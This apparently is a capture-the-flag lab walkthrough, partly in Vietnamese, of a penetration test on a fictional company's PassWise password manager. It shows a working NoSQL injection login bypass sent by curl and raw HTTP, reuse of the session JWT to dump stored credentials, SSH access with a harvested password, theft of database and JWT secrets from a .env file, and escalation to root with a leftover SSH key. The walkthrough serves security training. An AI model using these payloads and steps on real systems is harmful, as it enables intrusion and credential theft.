Cyber Vault Lab
Cyber Vault Lab
In light of the recent increase in cyber-attacks around the world, as a cybersecurity firm, you have been assigned to perform penetration testing on the systems of a company called ValkyrieDigital. Your task is to perform a vulnerability scan on the password management software used by the company and report your findings. Good luck!
What is the version number on the home page after logging in?
- Trước hết scan mục tiêu bằng nmap
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #nmap -sV -sC passwise.valkyriedigital.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-02 09:42 CST
Nmap scan report for passwise.valkyriedigital.hv (172.20.6.114)
Host is up (0.00038s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 72:f3:36:e3:82:44:5f:cc:af:1a:eb:ad:9d:c1:0f:5b (RSA)
| 256 74:97:ec:65:4f:3d:86:5e:dd:76:65:86:60:67:a8:c4 (ECDSA)
|_ 256 24:b2:a7:4a:6e:ea:75:ff:d4:af:ea:32:dd:2f:96:34 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-title: Login - PassWise
|_Requested resource was /login
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 52:54:00:C9:91:6C (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.43 seconds- Sau đó thử injection bằng SQl và No SQL và đã có payload thành công :
{"email": {"$ne": ""}, "password": {"$ne": ""}}- Dùng curl để gửi payload :
curl -X POST http://passwise.valkyriedigital.hv/login \
-H "Content-Type: application/json" \
-d '{"email": {"$ne": ""}, "password": {"$ne": ""}}'- Nếu không ta cũng có thể dùng Burp Suite để gửi request có payload :
POST /login HTTP/1.1
Host: passwise.valkyriedigital.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 49
Origin: http://passwise.valkyriedigital.hv
Connection: keep-alive
Referer: http://passwise.valkyriedigital.hv/login
Priority: u=0
{"email": {"$ne": ""}, "password": {"$ne": ""}}- Kết quả là :
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 02 Dec 2025 15:49:37 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 55
Connection: keep-alive
X-Powered-By: Express
Set-Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk; Max-Age=18000; Path=/; Expires=Tue, 02 Dec 2025 20:49:37 GMT; HttpOnly
ETag: W/"37-zlcgX4RY9AaDEj8FY8NljYkMc0U"
{"status":"success","message":"Logged in successfully"}- Response có chứa Jwt , dùng jwt để login vào mục tiêu :
┌─[root@hackerbox]─[~]
└──╼ #curl -H "Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk" http://passwise.valkyriedigital.hv/ | grep "version"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
<li>version 2.4.5</li>0 0 0 --:--:-- --:--:-- --:--:-- 0
100 12726 100 12726 0 0 1083k 0 --:--:-- --:--:-- --:--:-- 1129k
┌─[root@hackerbox]─[~]
└──╼ #==> The Answer : 2.4.5
What is the username and password of the server the website is running on?
- Username và Password ở câu 1 luôn :
┌─[root@hackerbox]─[~]
└──╼ #curl -H "Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk" http://passwise.valkyriedigital.hv/
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Dashboard - PassWise</title>
<link rel="stylesheet" href="/css/style.css">
<link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon">
</head>
<body>
<div class="bar">
<h1 href="#" class="logo">PassWise</h1>
<div class="alias">
<a href="javascript:" number="8" description="Collection">ITEMS</a>
<a href="javascript:" description="GENERATOR" class="generate">PASSWORD</a>
<a href="/logout" number="" class="out" description="Logout">LOGOUT</a>
</div>
</div>
<input class="search" type="search" id="search" size="15" placeholder="Type..." autocomplete="off">
<nav class="add_new">
<li class="new">new</li>
<li>version 2.4.5</li>
<span class="submen">
<li class="item">Item</li>
</span>
</nav>
<aside>
<div class="copier" style="display: none;">
<summary class="_item">
<a class="remove_summary"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_section"></a>
<span contenteditable="true" parent="URL/Site/Host" class="site">Click to edit</span>
<span contenteditable="true" parent="Username" class="username">Click to edit</span>
<span contenteditable="true" parent="Password" class="password">Click to edit</span>
<span contenteditable="true" parent="Other" class="other">Click to edit</span>
</section>
</summary>
</div>
<article style="display: none;" class="cloned">
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr1">
<label for="pr1">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main number="01" contenteditable="true">Type the Item name</main>
<summary class="_item">
<a class="remove_summary"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_section"></a>
<span contenteditable="true" parent="URL/Site/Host" class="site">Click to edit</span>
<span contenteditable="true" parent="Username" class="username">Click to edit</span>
<span contenteditable="true" parent="Password" class="password">Click to edit</span>
<span contenteditable="true" parent="Other" class="other">Click to edit</span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="01" tag="items"><img src="/images/tag.png">Admin Panel</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">admin</span>
<span parent="Password" class="password">9BNMFWwQ5SNeAc9</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="02" tag="items"><img src="/images/tag.png">Instagram</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">instagram.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">VFhZpayAnkQR9aRS</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="03" tag="items"><img src="/images/tag.png">Support Panel</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">support</span>
<span parent="Password" class="password">9BNMFWwQ5SNeAc9</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="05" tag="items"><img src="/images/tag.png">SSH Server</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">sherpa</span>
<span parent="Password" class="password">7SnkaxtH7CqbcU</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="04" tag="items"><img src="/images/tag.png">Facebook</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">facebook.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">wUGmzsx4gEg</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="06" tag="items"><img src="/images/tag.png">Twitter</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">twitter.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">YXnkVgszHmUGhW8ZaWWkGCdA</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="07" tag="items"><img src="/images/tag.png">FTP Server</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username"></span>
<span parent="Password" class="password"></span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
</aside>
<script src='/js/jquery.min.js'></script>
<script src="/js/script.js"></script>
</body>
</html>
┌─[root@hackerbox]─[~]
└──╼ #
- Username : sherpa
- Password : 7SnkaxtH7CqbcU
- Tôi dùng nó để connect ssh :
┌─[root@hackerbox]─[~]
└──╼ #ssh sherpa@172.20.6.114
sherpa@172.20.6.114's password:
Linux debian 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sherpa@debian:~$ ==> The Answer : sherpa:7SnkaxtH7CqbcU
What is the database password?
sherpa@debian:~$ ls
passwise
sherpa@debian:~$ pwd
/home/sherpa
sherpa@debian:~$ cd *
sherpa@debian:~/passwise$ ls
controllers database.js index.js middleware models node_modules package.json package-lock.json routes static views
sherpa@debian:~/passwise$ ls -la
total 108
drwxr-xr-x 9 sherpa sherpa 4096 Feb 27 2024 .
drwxr-xr-x 5 sherpa sherpa 4096 Feb 27 2024 ..
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 controllers
-rw-r--r-- 1 sherpa sherpa 346 Feb 26 2024 database.js
-rw-r--r-- 1 sherpa sherpa 120 Feb 27 2024 .env
-rwxr-xr-x 1 sherpa sherpa 788 Feb 27 2024 index.js
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 middleware
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 models
drwxr-xr-x 113 sherpa sherpa 4096 Feb 26 2024 node_modules
-rw-r--r-- 1 sherpa sherpa 414 Feb 26 2024 package.json
-rw-r--r-- 1 sherpa sherpa 54867 Feb 26 2024 package-lock.json
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 routes
drwxr-xr-x 6 sherpa sherpa 4096 Feb 27 2024 static
drwxr-xr-x 2 sherpa sherpa 4096 Feb 27 2024 views
sherpa@debian:~/passwise$ cat .env
PORT = 9000
MONGODB_URI = mongodb://root:vhCZFwBaFqKtMbMshL4eYXvp@localhost:27017
JWT_SECRET = L96d9jbndy977Ws9hBWEDm2Ssherpa@debian:~/passwise$
sherpa@debian:~/passwise$ ==> The Answer : root:vhCZFwBaFqKtMbMshL4eYXvp
—
What is the key value used for JWT (JSON Web Token)?
==> The Answer : L96d9jbndy977Ws9hBWEDm2S
What is the last terminal command run by the root user?
sherpa@debian:/home$ ls
root_id_rsa root_id_rsa.pub sherpa
sherpa@debian:/home$ chmod 600 root_id_rsa
sherpa@debian:/home$ ls -la
total 20
drwxr-xr-x 3 root root 4096 Feb 27 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 sherpa sherpa 3369 Feb 27 2024 root_id_rsa
-rw------- 1 sherpa sherpa 737 Feb 27 2024 root_id_rsa.pub
drwxr-xr-x 6 sherpa sherpa 4096 Dec 2 11:26 sherpa
sherpa@debian:/home$ ssh -i root_id_rsa root:localhost
ssh: Could not resolve hostname root:localhost: Name or service not known
sherpa@debian:/home$ ssh -i root_id_rsa root@localhost
Linux debian 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 2 11:31:16 2025 from ::1
root@debian:~# ls
root@debian:~# cd /root
root@debian:~# ls
root@debian:~# ls -la
total 28
drwx------ 4 root root 4096 Feb 27 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 root root 52 Dec 2 11:31 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 26 2024 .local
-rw------- 1 root root 0 Feb 26 2024 .mongorc.js
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Feb 27 2024 .ssh
root@debian:~# history
1 ifconfig
2 passwd sherpa
3 apt-get update
4 ls
5 cd /root
6 ls
7 ls -la
9 history
root@debian:~#
==> The Answer : apt-get update